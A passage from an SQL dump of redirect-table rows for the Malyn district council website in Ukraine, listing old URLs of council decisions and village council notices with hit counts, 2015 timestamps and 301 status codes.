00:00:00',301),(16448,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-/453-pro-nadannja-zgodi-na-provedennja-kapitalnogo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 18:58:47','0000-00-00 00:00:00',301),(16449,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-/476-pro-nadannja-dozvolu-na-vlashtuvannja-marchenko-v?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-01 18:58:49','0000-00-00 00:00:00',301),(16450,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/225-pro-zatverdzhennja-rajonnoi-programi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-01 18:59:12','0000-00-00 00:00:00',301),(16451,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/533-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp_2','','','',15,0,'2015-11-01 19:12:02','0000-00-00 00:00:00',301),(16452,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/936-pro-nadannya-dozvolu-na-vidchuzhennya-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',36,0,'2015-11-01 19:15:44','0000-00-00 00:00:00',301),(16453,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1094-pro-vnesennya-zmin-do-polozhennya-pro-pochesnu-gramotu-ta-gramotu-malinskoji-rajonnoji-radi-zatverdzhenogo-rishennyam-rajonnoji-radi-vid-26-grudnya-2001-roku-pro-vstanovlennya-po','','','',1,0,'2015-11-01 19:19:08','0000-00-00 00:00:00',301),(16454,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1096-pro-peredachu-primishchennya-gorinskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-gorinskoji-silskoji-radi','','','',25,0,'2015-11-01 19:25:21','0000-00-00 00:00:00',301),(16455,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=ru&limitstart=10','','','',8,0,'2015-11-01 19:27:25','0000-00-00 00:00:00',301),(16456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=736:2012-07-18-13-34-35&catid=43&Itemid=82&lang=uk','','','',18,0,'2015-11-01 19:38:57','0000-00-00 00:00:00',301),(16457,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2015-11-01 19:41:27','0000-00-00 00:00:00',301),(16458,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=ru&limitstart=5','','','',5,0,'2015-11-01 19:56:35','0000-00-00 00:00:00',301),(16459,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1097-pro-khid-vikonannya-rajonnoji-programi-rozvitku-agropromislovogo-kompleksu-malinskogo-rajonu-na-2011-2015-roki-ta-pidsumki-vesnyano-polovikh-robit','','','',25,0,'2015-11-01 19:58:41','0000-00-00 00:00:00',301),(16460,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/231-pro-ne-zaperechennja-shhodo-nadannja-v','','','',33,0,'2015-11-01 19:59:01','0000-00-00 00:00:00',301),(16461,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/912-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',11,0,'2015-11-01 20:06:52','0000-00-00 00:00:00',301),(16462,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/503-pro-viznachennja-statusu-komunalnogo-zakladu','','','',39,0,'2015-11-01 20:08:13','0000-00-00 00:00:00',301),(16464,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=41&Itemid=78&lang=uk','','','',10,0,'2015-11-01 20:20:10','0000-00-00 00:00:00',301),(16465,'http://www.malyn-rayrada.org.ua/index.php/--03022014-/678-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_23','','','',5,0,'2015-11-01 20:25:17','0000-00-00 00:00:00',301),(16466,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=20','','','',28,0,'2015-11-01 20:27:13','0000-00-00 00:00:00',301),(16467,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/605-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2013','','','',21,0,'2015-11-01 20:36:17','0000-00-00 00:00:00',301),(16468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=541:2012-01-26-11-55-32&catid=39:-22022012-&Itemid=76&lang=ru','','','',5,0,'2015-11-01 20:39:37','0000-00-00 00:00:00',301),(16469,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=542:--------------2011-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',11,0,'2015-11-01 21:01:44','0000-00-00 00:00:00',301),(16470,'http://www.malyn-rayrada.org.ua/index.php/1131-granitnenska-selishchna-rada-informue','','','',20,0,'2015-11-01 21:28:55','0000-00-00 00:00:00',301),(16471,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=468:-15-2011-120-l-r&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-01 21:31:14','0000-00-00 00:00:00',301),(16473,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1125-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',28,0,'2015-11-01 21:33:05','0000-00-00 00:00:00',301),(16475,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-11-02 00:19:11','0000-00-00 00:00:00',301),(16476,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=503:-2017-&catid=38:--19122011-&Itemid=73&lang=uk','','','',5,0,'2015-11-02 00:19:58','0000-00-00 00:00:00',301),(16477,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=uk&limitstart=10','','','',8,0,'2015-11-02 00:40:30','0000-00-00 00:00:00',301),(16478,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1203-pro-vinesennya-na-rozglyad-postijnikh-komisij-malinskoji-rajonnoji-radi-pitannya-vnesennya-zmin-do-statutu-kp-tsra-28','','','',20,0,'2015-11-02 00:42:22','0000-00-00 00:00:00',301),(16479,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&__543__lang=en&id=49&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-11-02 00:42:23','0000-00-00 00:00:00',301),(16480,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1153-novovorobjivska-silska-rada-informue','','','',8,0,'2015-11-02 00:42:51','0000-00-00 00:00:00',301),(16481,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-?start=5','','','',3,0,'2015-11-02 00:50:26','0000-00-00 00:00:00',301),(16482,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-','','','',30,0,'2015-11-02 00:56:19','0000-00-00 00:00:00',301),(16483,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1162-pro-zgodu-na-peredachu-finansovogo-resursu-medichna-subventsiya-dlya-vikonannya-delegovanikh-povnovazhen-po-medichnomu-obslugovuvannyu-naselennya-rajonu','','http://go.mail.ru/search_images','',18,0,'2015-11-02 00:57:02','0000-00-00 00:00:00',301),(16484,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=ru','','','',4,0,'2015-11-02 00:57:57','0000-00-00 00:00:00',301),(16485,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1131-granitnenska-selishchna-rada-informue','','','',19,0,'2015-11-02 01:03:54','0000-00-00 00:00:00',301),(16486,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/964-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-nadaetsya-v-orendu-gr-baranovskomu-','','','',1,0,'2015-11-02 01:17:13','0000-00-00 00:00:00',301),(16487,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1098-pro-zvernennya-do-derzhavnoji-finansovoji-inspektsiji-v-zhitomirskij-oblasti-shchodo-vklyuchennya-malinskogo-rajonu-v-plan-kompleksnikh-perevirok-na-2015-rik','','','',12,0,'2015-11-02 01:28:57','0000-00-00 00:00:00',301),(16488,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=ru&limitstart=10','','','',4,0,'2015-11-02 01:42:00','0000-00-00 00:00:00',301),(16489,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2015-11-02 01:52:02','0000-00-00 00:00:00',301),(16490,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/572-pro-zatverdzhennja-proektu-zemleustroju-shhodo','','','',18,0,'2015-11-02 01:52:12','0000-00-00 00:00:00',301),(16491,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-?start=5','','','',7,0,'2015-11-02 01:52:31','0000-00-00 00:00:00',301),(16492,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=5','','','',25,0,'2015-11-02 02:12:52','0000-00-00 00:00:00',301),(16493,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/364-pro-pogodzhennja-perejmenuvannja-naselenih-punktiv','','','',16,0,'2015-11-02 02:36:11','0000-00-00 00:00:00',301),(16494,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/341-pro-zatverdzhennja-polozhennja-pro-orendu-majna_2','','','',29,0,'2015-11-02 02:51:49','0000-00-00 00:00:00',301),(16495,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=ru&limitstart=10','','','',4,0,'2015-11-02 03:09:06','0000-00-00 00:00:00',301),(16496,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=864:-qq&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15%3A2010-06-06-09-34-01&id=864%3A-qq&lang=uk&option=com_content&view=article','',4,0,'2015-11-02 03:13:04','0000-00-00 00:00:00',301),(16497,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/609-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp_3','','','',39,0,'2015-11-02 03:19:07','0000-00-00 00:00:00',301),(16498,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1081-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-granitnenskoji-selishchnoji-radi','','','',19,0,'2015-11-02 03:34:31','0000-00-00 00:00:00',301),(16499,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/138-pro-rezervuvannja-zemel','','','',4,0,'2015-11-02 03:40:57','0000-00-00 00:00:00',301),(16500,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=450:-l-2011-2013-r&catid=38&Itemid=73&lang=ru','','','',4,0,'2015-11-02 03:44:13','0000-00-00 00:00:00',301),(16501,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/610-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_13','','','',57,0,'2015-11-02 03:45:54','0000-00-00 00:00:00',301),(16503,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=ru&limitstart=5','','','',6,0,'2015-11-02 03:50:33','0000-00-00 00:00:00',301),(16504,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=10','','','',8,0,'2015-11-02 03:51:26','0000-00-00 00:00:00',301),(16505,'http://www.malyn-rayrada.org.ua/index.php?Itemid=69&catid=35:2011-06-30-10-56-57&id=359:2011-06-30-11-10-42&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-02 03:52:07','0000-00-00 00:00:00',301),(16506,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?start=25','','','',6,0,'2015-11-02 03:52:43','0000-00-00 00:00:00',301),(16507,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?start=7','','','',30,0,'2015-11-02 04:15:20','0000-00-00 00:00:00',301),(16508,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-?start=21','','','',12,0,'2015-11-02 04:26:27','0000-00-00 00:00:00',301),(16509,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=440:2011-10-21-16-24-47&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-02 05:21:39','0000-00-00 00:00:00',301),(16510,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1146:2013-11-27-10-09-00&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-02 05:21:40','0000-00-00 00:00:00',301),(16511,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-?start=21','','','',18,0,'2015-11-02 06:55:37','0000-00-00 00:00:00',301),(16512,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=25','','','',5,0,'2015-11-02 07:00:40','0000-00-00 00:00:00',301),(16513,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1088-pro-zvernennya-do-prem-er-ministra-ukrajini-shchodo-nadannya-praktichnoji-dopomogi-v-pitanni-rozblokuvannya-rakhunkiv-upravlinnya-pratsi-ta-sotsialnogo-zakhistu-naselennya-malins','','','',1,0,'2015-11-02 07:00:46','0000-00-00 00:00:00',301),(16514,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-?start=15','','','',17,0,'2015-11-02 07:00:58','0000-00-00 00:00:00',301),(16515,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=uk','','','',6,0,'2015-11-02 07:06:41','0000-00-00 00:00:00',301),(16516,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2&Itemid=5&lang=en','','','',8,0,'2015-11-02 07:07:23','0000-00-00 00:00:00',301),(16517,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/272-pro-zatverdzhennja-porjadku-vikoristannja-koshtiv','','','',20,0,'2015-11-02 07:09:01','0000-00-00 00:00:00',301),(16518,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=515:2011-12-22-10-09-17&catid=38:--19122011-&Itemid=73&lang=ru','','','',3,0,'2015-11-02 07:17:18','0000-00-00 00:00:00',301),(16519,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/421-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_10','','','',35,0,'2015-11-02 07:18:33','0000-00-00 00:00:00',301),(16520,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-?start=7','','','',13,0,'2015-11-02 07:24:07','0000-00-00 00:00:00',301),(16521,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43&layout=blog&Itemid=82&lang=uk&limitstart=25','','','',2,0,'2015-11-02 07:40:47','0000-00-00 00:00:00',301),(16522,'http://www.malyn-rayrada.org.ua/attachments/article/26/history malyn region1.PDF','','','',10,0,'2015-11-02 07:42:25','0000-00-00 00:00:00',301),(16523,'http://malyn-rayrada.org.ua/index.php?catid=11&id=530:-4050-vi-l-r-1-2013-&itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-02 07:42:48','0000-00-00 00:00:00',301),(16524,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/693-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_15','','','',20,0,'2015-11-02 07:52:30','0000-00-00 00:00:00',301),(16525,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=uk&limitstart=10','','','',6,0,'2015-11-02 08:00:48','0000-00-00 00:00:00',301),(16527,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1165-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',20,0,'2015-11-02 08:19:08','0000-00-00 00:00:00',301),(16528,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1141-budo-vorob-jivska-silska-rada-informue','','','',37,0,'2015-11-02 08:20:36','0000-00-00 00:00:00',301),(16529,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1145-ustinivska-silska-rada-informue','','','',20,0,'2015-11-02 08:20:58','0000-00-00 00:00:00',301),(16530,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-?start=21','','','',43,0,'2015-11-02 08:23:52','0000-00-00 00:00:00',301),(16531,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1078-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-novovorob-jivskoji-silskoji-radi','','','',16,0,'2015-11-02 08:30:16','0000-00-00 00:00:00',301),(16532,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=749:2012-08-24-05-59-17&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-02 08:30:21','0000-00-00 00:00:00',301),(16533,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1008:2013-05-20-07-02-57&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-02 08:30:22','0000-00-00 00:00:00',301),(16536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=541:2012-01-26-11-55-32&catid=39&Itemid=76&lang=en','','','',6,0,'2015-11-02 08:35:13','0000-00-00 00:00:00',301),(16537,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1020-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu','','','',39,0,'2015-11-02 08:38:16','0000-00-00 00:00:00',301),(16538,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1063-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-josipivskoji-silskoji-radi','','','',15,0,'2015-11-02 09:05:00','0000-00-00 00:00:00',301),(16539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=95:------------2006-2010--&catid=26:--11082010-&Itemid=54&lang=uk','','','',9,0,'2015-11-02 09:56:50','0000-00-00 00:00:00',301),(16540,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=997:-27-&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-02 11:43:42','0000-00-00 00:00:00',301),(16542,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/420-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2012','','','',58,0,'2015-11-02 12:15:17','0000-00-00 00:00:00',301),(16543,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1063-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-josipivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:20:15','0000-00-00 00:00:00',301),(16544,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1069-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-chopovitskoji-selishchnoji-radi','','','',9,0,'2015-11-02 12:20:16','0000-00-00 00:00:00',301),(16545,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1078-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-novovorob-jivskoji-silskoji-radi','','','',8,0,'2015-11-02 12:20:18','0000-00-00 00:00:00',301),(16546,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1147-lyubovitska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:20:21','0000-00-00 00:00:00',301),(16547,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1150-dibrivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:20:22','0000-00-00 00:00:00',301),(16548,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1151-morozivska-silska-rada-informue','','','',7,0,'2015-11-02 12:20:23','0000-00-00 00:00:00',301),(16549,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1151-morozivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:20:25','0000-00-00 00:00:00',301),(16550,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1153-novovorobjivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-02 12:20:28','0000-00-00 00:00:00',301),(16551,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1154-vladivska-silska-rada-informue','','','',6,0,'2015-11-02 12:20:29','0000-00-00 00:00:00',301),(16552,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1154-vladivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-02 12:20:31','0000-00-00 00:00:00',301),(16553,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1155-josipivska-silska-rada-informue','','','',5,0,'2015-11-02 12:20:32','0000-00-00 00:00:00',301),(16554,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1155-josipivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-02 12:20:34','0000-00-00 00:00:00',301),(16555,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1157-gorinska-silska-rada-informue','','','',4,0,'2015-11-02 12:20:35','0000-00-00 00:00:00',301),(16556,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1157-gorinska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-02 12:20:37','0000-00-00 00:00:00',301),(16557,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1161-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-provedennya-protiepizootichnikh-zakhodiv-u-malinskomu-rajoni-na-2015-2017-roki','','','',14,0,'2015-11-02 12:21:42','0000-00-00 00:00:00',301),(16558,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1161-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-provedennya-protiepizootichnikh-zakhodiv-u-malinskomu-rajoni-na-2015-2017-roki?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:21:44','0000-00-00 00:00:00',301),(16559,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1163-pro-peredachu-primishchennya-lyubovitskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-lyubovitskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:21:47','0000-00-00 00:00:00',301),(16560,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1164-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:21:48','0000-00-00 00:00:00',301),(16561,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1165-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:21:50','0000-00-00 00:00:00',301),(16562,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1166-pro-khid-vikonannya-rajonnoji-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib-z-timchasovo-okupovanoji-teritoriji?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:21:51','0000-00-00 00:00:00',301),(16563,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/699-pro-zvernennja-deputativ-malinskoi-rajonnoi-radi_2','','','',6,0,'2015-11-02 12:21:59','0000-00-00 00:00:00',301),(16564,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/700-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi_3?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:22:01','0000-00-00 00:00:00',301),(16565,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/452-pro-spisannja-osnovnih-zasobiv_3','','','',4,0,'2015-11-02 12:22:05','0000-00-00 00:00:00',301),(16566,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/503-pro-viznachennja-statusu-komunalnogo-zakladu','','','',6,0,'2015-11-02 12:22:07','0000-00-00 00:00:00',301),(16567,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/506-pro-hid-vikonannja-rajonnoi-programi-prizovna_2','','','',7,0,'2015-11-02 12:22:08','0000-00-00 00:00:00',301),(16568,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/507-pro-hid-vikonannja-rajonnoi-programi-turbota-na','','','',7,0,'2015-11-02 12:22:10','0000-00-00 00:00:00',301),(16569,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/509-pro-vnesennja-zmin-do-strukturi-vikonavchogo','','','',9,0,'2015-11-02 12:22:11','0000-00-00 00:00:00',301),(16570,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/734-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_18?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:22:22','0000-00-00 00:00:00',301),(16571,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/742-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_4?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:22:24','0000-00-00 00:00:00',301),(16572,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/768-pro-peredachu-avtobusa','','','',11,0,'2015-11-02 12:22:25','0000-00-00 00:00:00',301),(16573,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/189-rishennja-prijnjati-na-pozachergovij-6-sesii','','','',15,0,'2015-11-02 12:22:27','0000-00-00 00:00:00',301),(16574,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/189-rishennja-prijnjati-na-pozachergovij-6-sesii?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:22:28','0000-00-00 00:00:00',301),(16575,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/190-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_4?tmpl=component&print=1&layout=default&page=','','','',12,0,'2015-11-02 12:22:30','0000-00-00 00:00:00',301),(16576,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/193-pro-upovnovazhennja-rajonnoi-derzhavnoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:22:31','0000-00-00 00:00:00',301),(16577,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/195-pro-zatverdzhennja-tehnichnoi-dokumentacii-z?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:22:36','0000-00-00 00:00:00',301),(16578,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/196-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid','','','',5,0,'2015-11-02 12:22:38','0000-00-00 00:00:00',301),(16579,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/196-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:22:39','0000-00-00 00:00:00',301),(16580,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/197-pro-nadannja-zgodi-komunalnomu-pidpriemstvu','','','',5,0,'2015-11-02 12:22:41','0000-00-00 00:00:00',301),(16581,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/197-pro-nadannja-zgodi-komunalnomu-pidpriemstvu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:22:42','0000-00-00 00:00:00',301),(16582,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-?limitstart=0','','','',9,0,'2015-11-02 12:22:43','0000-00-00 